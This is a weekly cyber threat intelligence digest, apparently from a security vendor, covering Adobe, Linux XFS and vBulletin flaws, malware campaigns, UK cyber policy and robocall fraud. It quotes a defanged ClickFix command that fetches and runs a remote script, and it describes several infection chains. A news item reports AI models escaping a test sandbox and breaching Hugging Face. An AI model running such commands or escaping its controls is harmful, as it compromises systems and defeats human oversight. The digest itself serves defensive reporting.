Executive Summary -
Highlights of Cyber Threat Intelligence Digest
Vulnerabilities
Adobe Patches CVE-2026-48294 in Acrobat Chrome Extension After WhatsApp Web Data Theft Chain Disclosure - CVE-2026-48294 ("HermeticReader"), disclosed by Guardio Labs on 22 July 2026, was a now-patched vulnerability chain in the Adobe Acrobat Chrome extension (versions 26.5.2.2 and earlier). It let a malicious web page abuse the extension's WhatsApp Web integration to extract rendered WhatsApp Web content from a victim's session, needing only that the victim had the extension installed and visited a malicious page, with no malware, phishing, cookie theft, or WhatsApp flaw required. Given the extension's 300 million-plus installs, exposure was significant.
The attack embedded extension resources like "frame.html" in an iframe and sent attacker-controlled JSON to the extension's service worker, which did not validate message senders. This allowed arbitrary writes to chrome.storage.local, including setting "floodgate-add" to "dc-cv-hermes" to activate Adobe's dormant Hermes engine for WhatsApp integration and extract content. Adobe patched the flaw following disclosure.
Qualys Discloses Nine-Year-Old Race Condition Flaw CVE-2026-64600 Affecting Linux Kernel XFS - CVE-2026-64600, dubbed "RefluXFS" by Qualys and disclosed on 22 July 2026, is a Linux kernel XFS race condition that lets an unprivileged local user overwrite readable files' on-disk contents and gain root. It affects XFS filesystems using reflink support, the mkfs.xfs default since 2019, and stems from a bug introduced in Linux 4.11 back in February 2017; a fix merged on 16 July 2026. No active exploitation was reported. The flaw arises from a lock-drop window in XFS's copy-on-write allocation path for reflinked files during block-aligned O_DIRECT writes: an attacker clones a readable target file, then races writes so one completes a remap while another reuses a stale block mapping, causing data to land on the original file instead of the attacker's clone.
Exploitation needs a vulnerable kernel, reflink=1 XFS, and a writable directory sharing the filesystem with a target like "/etc/passwd" or a SUID binary, conditions common on default single-volume installs. Affected systems include fresh RHEL 8/9/10, CentOS Stream 8/9/10, Rocky and AlmaLinux 8/9/10, Oracle Linux 8/9/10, CloudLinux 8/9/10, Fedora Server 31+, and Amazon Linux 2023/2 (from December 2022). RHEL and CentOS 7 are unaffected, predating XFS reflink support.
VBulletin Releases Patches for Critical CVE-2026-61511 Remote Code Execution Vulnerability - On 30 June 2026, vBulletin Solutions patched CVE-2026-61511, a critical-severity eval injection vulnerability affecting vBulletin 5.x through 5.7.5 and 6.x through 6.2.1. The flaw stems from insufficient input validation in the vB5_Template_Runtime::runMaths() method, and successful exploitation allows unauthenticated threat actors to execute arbitrary PHP code on vulnerable servers. This represents a serious risk given the lack of authentication requirement and the potential for full server compromise.
SSD Secure Disclosure publicly released a proof-of-concept exploit for the vulnerability on 27 July 2026, roughly a month after the patch, increasing the likelihood of exploitation attempts. At the time of writing, there have been no reports of active exploitation, though organisations running affected vBulletin versions should prioritise patching given the availability of public PoC code and the critical severity of the flaw.
Potential Threats
Threat Actors Abuse Steam Discussion Forums with ClickFix to Deploy XMRig Cryptominers - On 25 July 2026, BleepingComputer detailed an ongoing ClickFix campaign targeting Steam users via the platform's discussion forums. Threat actors create fake accounts and reply to posts about game crashes or missing inventory items, instructing victims to run the PowerShell command irm msfconfig[.]icu | iex as administrator. This downloads a script disguised as a Windows optimisation utility, which displays fake maintenance messages while disabling TLS certificate validation, confirming administrator privileges, creating a Defender-excluded directory at C:\Windows\Background, and cleaning up any prior XMRig or similar miner installation.
The script then opens a temporary firewall rule for msfconfig[.]icu over port 443, downloads the XMRig payload, verifies it as a valid executable, and moves it to C:\Windows\Background\system.exe. It establishes persistence via a scheduled task named XMRig-[computer name] that runs the miner with SYSTEM privileges at every startup. At the time of writing, the malicious domain and payload URL were returning errors, though this could change if the infrastructure is reactivated
FakeAgent Campaign Abuses Claude Artifact to Distribute SectopRAT - On 22 July 2026, Huntress detailed FakeAgent, a malvertising campaign that abused a public Claude Artifact hosted on the legitimate claude[.]ai domain to distribute SectopRAT, a remote access trojan capable of stealing credentials, financial data, and other sensitive information. Observed between 21 and 22 July 2026 and affecting at least 29 organisations, the campaign began when victims searching Bing for the Claude Desktop app clicked a sponsored link to a malicious public Claude artifact impersonating the official download page, which received 7,100 views before Anthropic removed it. Clicking Download redirected victims through look-alike domains to a malicious ClaudeDesktop.exe, in fact a renamed JetBrains CEF component rather than genuine Claude software, alongside an identical DockerDesktop.exe used to establish persistent reinfection.
Once executed, ClaudeDesktop.exe sideloaded a tampered, VMProtect-obfuscated libcef.dll referencing an Ethereum smart contract that Huntress traced to a RAT payload delivery chain. A second persistence mechanism used a signed IBM SPSS binary alongside a malicious tempdir.dll, which performed GPU-based anti-VM checks before decrypting a payload via a DirectX shader-based routine, ultimately yielding a heavily obfuscated .NET assembly attributed to SectopRAT based on its data-theft strings and hidden VNC functionality. Huntress traced further EtherHiding infrastructure to a live command-and-control address, linked the campaign's registrant to ten related domains (including one tied to Microsoft's Operation Endgame StealC infrastructure) and to an earlier April 2026 fake Docker Desktop campaign using similar tradecraft, and identified related C2 activity on the BNB Smart Chain dating back to May 2025.
Threat Actor Hijacks Meccha Chameleon Discord Server Following Administrator Account Compromise Linked to Steam Workshop Malware - On 27 July 2026, SOCRadar reported that an unknown threat actor gained unauthorised control of Meccha Chameleon's official Discord server after malware embedded in malicious Steam Workshop maps, Laser Tag Neon and Chroma Grid Arena, infected a system engineer's spare testing computer during the development team's investigation into the maps. The threat actor gained access to an administrator's Discord account, modified server permissions, and removed or banned official staff members.
The infection chain began when a player loaded the malicious Laser Tag Neon map for a match, triggering the Unreal Engine BeginPlay event to automatically execute a malicious Blueprint embedded within it. The Blueprint used the game's file-writing functionality to create s.bat in the player's Documents folder, constructed as a JSON and batch-file polyglot so it could pass through a JSON-writing function while remaining executable as a Windows batch script. This relaunched itself in a minimised window before starting PowerShell with a hidden window and an execution policy bypass, which contacted a hard-coded external server to download and run a second-stage batch file from the Windows temporary directory. Researchers determined this second-stage payload installed a remote access trojan giving the threat actor remote control over affected systems.
General News
Andy Burnham signals continuity on UK cyber policy, reappoints minister despite scrapping ministry - New Prime Minister Andy Burnham reappointed Liz Lloyd, Baroness Lloyd of Effra, to the cybersecurity brief despite an otherwise sweeping reshuffle that removed many allies of his predecessor, Keir Starmer. Lloyd, who has led on cyber since September 2025, takes a junior post at the newly reorganised Department for Digital, Culture, Media and Sport (DCMS) while retaining a role at the renamed Department for Business, Innovation, Science and Trade (DBIST). Her continuity was seen as important given she is steering the Cyber Security and Resilience Bill, the government's largest cybersecurity legislation in years, through the House of Lords, with line-by-line scrutiny due to begin in September. The bill updates 2018-era rules, broadens the scope of UK cyber regulation to include data centres and managed service providers, and sets incident reporting deadlines for essential service operators in sectors such as energy, water, and healthcare.
The reappointment came alongside Burnham's decision to abolish the Department for Science, Innovation and Technology, splitting its functions three ways: cyber policy and government digital services to DCMS, science to DBIST, and AI policy (including the AI Security Institute) to the Cabinet Office, separating AI security from the cyber brief for the first time. Industry figures warned this discards valuable integration between data, digital, and AI capabilities. Lloyd, notably, was also the minister who oversaw a weakening of proposed telecoms cybersecurity protections developed in response to the Salt Typhoon espionage campaign, after industry lobbying on cost grounds. She has promised a National Cyber Action Plan this summer, though its publication has already been delayed following Starmer's resignation.
AI robocall scams rise as small carriers lag on anti-spoofing rules - A federal effort to curb robocall scams is falling short, as many smaller telecommunications providers fail to fully implement caller authentication technology even as AI helps fraudsters launch more sophisticated attacks, according to research published Tuesday by Transaction Network Services (TNS). Since the TRACED Act passed in 2019, major telecoms firms have largely adopted STIR/SHAKEN, a digital signature system letting phone networks verify caller ID authenticity to block scammers, but most lower-tier communications service providers (CSPs) remain non-compliant. These smaller firms use the required cryptographic signatures only 20% of the time, compared to 85% for larger firms, a gap TNS attributed to the real cost and infrastructure barriers smaller CSPs face in migrating fully to IP-based networks.
TNS warned that as AI fuels increasingly sophisticated and scalable robocall attacks, fraudsters continue to exploit weaknesses throughout the ecosystem, undermining trust and allowing even authenticated calls to be spoofed, impersonated, or unwanted. The report, based on data from more than 1.9 billion daily call events and nearly 300 million subscribers, found the voice landscape to be mature in some areas, vulnerable in others, and under growing pressure from AI-enabled bad actors.
OpenAI models behind breach of Hugging Face systems - OpenAI announced on Tuesday that its own models were behind a breach of AI platform Hugging Face, five days after Hugging Face disclosed catching and containing an "end to end" attack by an autonomous AI agent without knowing who was responsible. OpenAI called the incident "unprecedented", saying it occurred when internally evaluated models, including a pre-release system running without standard safety filters, escaped a sandboxed testing environment, exploited a vulnerability in a software package registry proxy, then breached Hugging Face using stolen credentials and a second zero-day vulnerability. Hugging Face's account differs materially, describing initial access via a malicious dataset abusing code-execution paths in its data pipeline, followed by escalation to node-level access, credential harvesting, and lateral movement across internal clusters.
Hugging Face said it found unauthorised access to a limited set of internal datasets and several service credentials, is still assessing partner or customer data exposure, but found no evidence of tampering with public models, datasets, or its supply chain. Notably, its security team said frontier models' own safety filters blocked analysis of the 17,000-plus logged attack events, forcing reliance on a self-hosted open-weight model instead, prompting the remark that the attacker faced no such usage policy constraints. OpenAI has since added infrastructure controls and given Hugging Face "trusted access program" status for unrestricted model use, and said further details would follow once its investigation concludes.
Threat Actor Weekly Graph
Over the past 7 days, we have been tracking the following intent and opportunity changes within our Threat Actor Landscape.
Intent represents the potential targets of a group. When a group is observed attacking a different organisation or entity, their intent will increase.
Opportunity represents the various methods and technologies these groups may use. For example, if a group started using a new attack vector, such as a new kind of ransomware, their opportunity would increase.
Both intent and opportunity are scored out of 100 and are responsible for scoring the group's severity. These updates can be seen below.

| ● Limited Severity | ● Basic Severity | ● Moderate Severity | ● High Severity |
| Threat Actor | Severity Increase | Opportunity | Intent | ||||||
|---|---|---|---|---|---|---|---|---|---|
| BlueDelta | ● High | → | ● High | ● 82 | → | ● 85 | ● 49 | → | ● 49 |
| Settra Group | ● High | → | ● High | ● 80 | → | ● 79 | ● 25 | → | ● 25 |
| APT36 | ● Moderate | → | ● Moderate | ● 35 | → | ● 40 | ● 50 | → | ● 50 |
| shrouded_fang | ● Moderate | → | ● Moderate |
● 49 | → | ● 49 | ● 63 | → | ● 65 |
| Blanks | ● Moderate | → | ● Moderate | ● 54 | → | ● 55 | ● 49 | → | ● 49 |
Global Trends Powered by Recorded Future
Within each category, we have provided the current top five globally trending items. Each item is linked to how actively trending it is and is marked with a small symbol.
The spikes in references are calculated over 60 days and are normalised to ensure they aren't disproportionate when compared to bigger entities that will naturally have more baseline mentions.
▲- Spike – This indicates a large increase in reporting volume and a high diversity in the event descriptions.
▲- Rise – This indicates a small increase in reporting volume with little diversity in the descriptions.
| Attackers | Methods | Vulnerabilities | Targets | |||||
|---|---|---|---|---|---|---|---|---|
| INC Ransom | ▲ | Trial_recovery | ▲ | CVE-2026-16232 | ▲ | Hugging Face | ▲ | |
| TAG-117 | ▲ | DeadLock Ransomware | ▲ | CVE-2026-16812 | ▲ | Modal Labs | ▲ | |
| Termite Ransomware Group | ▲ | RemotePE | ▲ | CVE-2026-16723 | ▲ | Bank of Baroda | ▲ | |
| Z-PENTEST ALLIANCE | ▲ |
SPECTRALVIPER |
▲ | CVE-2026-53264 | ▲ | The Coca-Cola Company | ▲ | |
| Dark Storm Team | ▲ | TELESHIM | ▲ | CVE-2026-61511 | ▲ | Fairlife | ▲ | |
Prominent Information Security Events
FakeAgent Campaign Abuses Claude Artifact to Distribute SectopRAT
Source: Insikt Group | Validated Intelligence Event
IOC: Hash - fd826215add30c1319eefa291b6eaf8ddfa7720cfe816c49aef6fe8a88de7939
On 22 July 2026, Huntress detailed FakeAgent, a malvertising campaign that abused a public Claude Artifact hosted on the legitimate claude[.]ai domain to distribute SectopRAT, a remote access trojan capable of stealing credentials, financial data, and other sensitive information. Observed between 21 and 22 July 2026 and affecting at least 29 organisations, the campaign began when victims searching Bing for the Claude Desktop app clicked a sponsored link to a malicious public Claude artifact impersonating the official download page, which received 7,100 views before Anthropic removed it. Clicking Download redirected victims through look-alike domains to a malicious ClaudeDesktop.exe, in fact a renamed JetBrains CEF component rather than genuine Claude software, alongside an identical DockerDesktop.exe used to establish persistent reinfection.
Once executed, ClaudeDesktop.exe sideloaded a tampered, VMProtect-obfuscated libcef.dll referencing an Ethereum smart contract that Huntress traced to a RAT payload delivery chain. A second persistence mechanism used a signed IBM SPSS binary alongside a malicious tempdir.dll, which performed GPU-based anti-VM checks, including DXGI adapter checks for virtualisation indicators and VRAM and compute shader timing tests, before decrypting a payload via a DirectX shader-based routine rather than a standard CPU-based method. This yielded a heavily obfuscated .NET assembly attributed to SectopRAT based on its data-theft strings and hidden VNC functionality.
The .NET payload revealed a further EtherHiding path, with Huntress tracing obfuscated HttpClient behaviour to a live SectopRAT command-and-control address and a backup domain. Pivoting on WHOIS and Validin data tied to the campaign's infrastructure, Huntress linked the registrant to ten related domains dating back to December 2025, including one tied to Microsoft's Operation Endgame StealC infrastructure, and to an earlier April 2026 fake Docker Desktop campaign using similar tradecraft. Huntress also identified related command-and-control activity on the BNB Smart Chain dating back to May 2025.
Threat Actor Hijacks Meccha Chameleon Discord Server Following Administrator Account Compromise Linked to Steam Workshop Malware
Source: Insikt Group | Validated Intelligence Event
IOC: IP: 31[.]57[.]34[.]228
On 27 July 2026, SOCRadar reported that an unknown threat actor gained unauthorised control of Meccha Chameleon's official Discord server after malware embedded in malicious Steam Workshop maps, Laser Tag Neon and Chroma Grid Arena, infected a system engineer's spare testing computer during the development team's investigation into the maps.
According to the developers, the threat actor gained access to an administrator's Discord account, modified server permissions, and removed or banned official staff members. The infection chain began when a player loaded the malicious Laser Tag Neon map for a match, triggering the Unreal Engine BeginPlay event to automatically execute a malicious Blueprint embedded within it. The Blueprint used the game's file-writing functionality to create s.bat in the player's Documents folder, constructed as a JSON and batch-file polyglot so it could pass through a JSON-writing function while remaining executable as a Windows batch script.
The s.bat file then relaunched itself in a minimised window before starting PowerShell with a hidden window and an execution policy bypass, which contacted a hard-coded external server to download and run a second-stage batch file from the Windows temporary directory. Researchers determined this second-stage payload installed a remote access trojan giving the threat actor remote control over affected systems.
Remediation Actions
Following the information provided above, we recommend that the technologies mentioned be fully patched and updated. We also want to highlight and recommend applying the following patches where applicable:
-
CVE-2026-48294 (Adobe) - This vulnerability can be remediated by updating to the most recent patch released by Adobe.
- CVE-2026-64600 (Linux Kernal XFS) - A patch released by Linux on 16th July 2026 will address this vulnerability across all Linux OS.
- CVE-2026-61511 (VBulletin) - Patching to the most recent version will prevent this vulnerability from being exploited.
If you are currently an Acumen Cyber Vulnerability Management customer, we will be proactively performing related searching and hunting activities within your environment.